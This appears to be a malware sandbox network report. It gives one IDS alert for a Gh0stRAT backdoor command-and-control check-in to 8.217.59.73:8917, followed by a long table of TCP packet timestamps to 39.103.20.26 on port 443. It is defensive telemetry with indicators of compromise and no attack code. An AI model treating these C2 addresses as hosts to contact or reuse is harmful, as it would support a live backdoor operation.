                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-06T04:51:51.032072+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6500008.217.59.738917TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 6, 2025 04:50:35.963324070 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:35.963365078 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:35.963442087 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:35.974822998 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:35.974836111 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.167665005 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.167736053 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.168438911 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.168593884 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.244149923 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.244170904 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.244529009 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.244576931 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.247033119 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.287328959 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.570020914 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.570103884 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.570126057 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.570157051 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.577723026 CET49921443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.577743053 CET4434992139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.658567905 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.658617020 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:37.658683062 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.659728050 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:37.659742117 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:38.832200050 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:38.835877895 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:38.837440014 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:38.837445974 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:38.837719917 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:38.837723970 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.174518108 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.174540043 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.174624920 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.174635887 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.174719095 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.174808979 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.174858093 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.176261902 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.176325083 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.179821014 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.179914951 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.261192083 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.261255980 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.261557102 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.261595011 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.261604071 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.261610985 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.261645079 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.261661053 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.262397051 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.262439013 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.262450933 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.262458086 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.262487888 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.262495995 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.263470888 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.263531923 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.264641047 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.264694929 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.264807940 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.264857054 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.266428947 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.266480923 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.347837925 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.347896099 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.347901106 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.347915888 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.347942114 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.347949982 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348334074 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348365068 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348378897 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348382950 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348392010 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348407030 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348423004 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348427057 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348439932 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348469973 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348792076 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348819017 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348834991 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348839998 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.348862886 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.348870039 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.349399090 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.349443913 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.349490881 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.349526882 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.349533081 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.349536896 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.349565029 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.349575996 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.349945068 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.349992037 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.350163937 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.350209951 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.350430965 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.350477934 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.351221085 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.351275921 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.353102922 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.353154898 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.353190899 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.353233099 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.434632063 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.434765100 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.434792995 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.434844971 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.434844971 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.434859037 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.434906960 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.434912920 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.434921980 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.434958935 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.436104059 CET49931443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.436119080 CET4434993139.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.458069086 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.458116055 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:39.458201885 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.458400011 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:39.458417892 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:40.678442955 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:40.678607941 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:40.678895950 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:40.678904057 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:40.679095984 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:40.679104090 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.018997908 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.019016981 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.019068956 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.019099951 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.019113064 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.019149065 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.019558907 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.019618034 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.020778894 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.020840883 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.024374008 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.024435043 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.111213923 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.111391068 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.111651897 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.111718893 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.112154007 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.112211943 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.112637997 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.112689018 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.113400936 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.113435030 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.113459110 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.113468885 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.113487959 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.113512039 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.115056038 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.115112066 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.115508080 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.115562916 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.116877079 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.116929054 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.203517914 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.203630924 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.203696012 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.203752041 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.203815937 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.203866959 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.204019070 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204071999 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.204246044 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204293966 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.204312086 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204375029 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.204898119 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204935074 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204952955 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.204960108 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204972982 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.204976082 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.204999924 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.205007076 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.205035925 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.205060005 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.205475092 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.205530882 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.205548048 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.205601931 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.205842018 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.205890894 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.207340956 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.207395077 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.207520962 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.207566023 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.209176064 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.209234953 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.209235907 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.209248066 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.209271908 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.209290981 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.295998096 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.296036005 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.296066046 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.296082020 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.296093941 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.296132088 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.296153069 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.296911955 CET49942443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.296928883 CET4434994239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.328804016 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.328818083 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:41.328882933 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.329035997 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:41.329047918 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.512820959 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.512902021 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.513278008 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.513284922 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.513498068 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.513503075 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.843882084 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.843908072 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.844019890 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.844075918 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.844253063 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.844471931 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.844532967 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.844871044 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.844932079 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.844933033 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.844980955 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.845190048 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.845225096 CET4434995339.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.845254898 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.845278025 CET49953443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.857770920 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.857786894 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:42.857872009 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.858067989 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:42.858078957 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.108333111 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.108470917 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.109091043 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.109097958 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.109312057 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.109317064 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.445549965 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.445574999 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.445617914 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.445630074 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.445652962 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.445703030 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.446109056 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.446160078 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.447381020 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.447446108 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.451359034 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.451422930 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.532115936 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.532177925 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.532191992 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.532212019 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.532238007 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.532311916 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.533363104 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.533401966 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.533416986 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.533421993 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.533451080 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.533463001 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.534097910 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.534157991 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.534732103 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.534797907 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.535958052 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.536011934 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.536317110 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.536360025 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.538060904 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.538113117 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.618798018 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.618839979 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.618880987 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.618891001 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619033098 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619033098 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619119883 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619175911 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619340897 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619398117 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619729042 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619772911 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619784117 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619787931 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619816065 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619817972 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619838953 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619843006 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619852066 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619868994 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619903088 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.619906902 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.619949102 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.620541096 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.620593071 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.620620966 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.620667934 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.621193886 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.621237040 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.621251106 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.621254921 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.621280909 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.621300936 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.621575117 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.621620893 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.622631073 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.622692108 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.624716997 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.624773026 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.666809082 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.666903973 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705627918 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705671072 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705703974 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705715895 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705743074 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705745935 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705761909 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705766916 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705795050 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705823898 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705831051 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705878973 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705881119 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705890894 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705924034 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705936909 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705943108 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:44.705949068 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705987930 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:44.705990076 CET49962443192.168.2.639.103.20.26
